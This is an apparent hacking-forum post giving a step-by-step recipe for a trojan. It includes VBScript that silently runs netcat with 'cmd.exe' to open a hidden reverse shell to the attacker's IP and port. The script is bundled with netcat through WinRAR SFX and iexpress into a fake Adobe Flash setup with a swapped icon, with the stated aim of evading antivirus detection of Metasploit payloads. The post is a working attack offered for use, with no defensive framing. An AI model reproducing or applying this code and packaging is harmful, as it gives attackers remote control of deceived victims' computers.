Hi all ... this is my first video here .. so hope you will like it
the video is so simple but it gives high result.. even after meta payloads are being detected
.. so netcat + vbs script are the solution
(i don't guess it will be caught some day)
steps:
1- edit the vbs code and write your external ip (if you want to use it out network) or your network ip ( if you want to use it in networks), and write the port, then save it as xx.vbs
here is the code
2- bind it with netcat.exe using winrar .. with some sfx optionCode:Const HIDDEN_WINDOW = 1 strComputer = "." Set objStartup = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_ProcessStartup") Set objProcess = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW errReturn = objProcess.Create("C:\nc.exe -d -e cmd.exe yourip port", null, objConfig, intProcessID)
3- bind the result file with Adobe flash setup using iexpress
4- change the icon using resource hacker
5- enjoy ^_^
video link MOD EDIT: New video link http://blip.tv/file/4248727
The quieter you become--the more you are able to hear((thats why the video has no sound :P:P hhh )



.. even after meta payloads are being detected
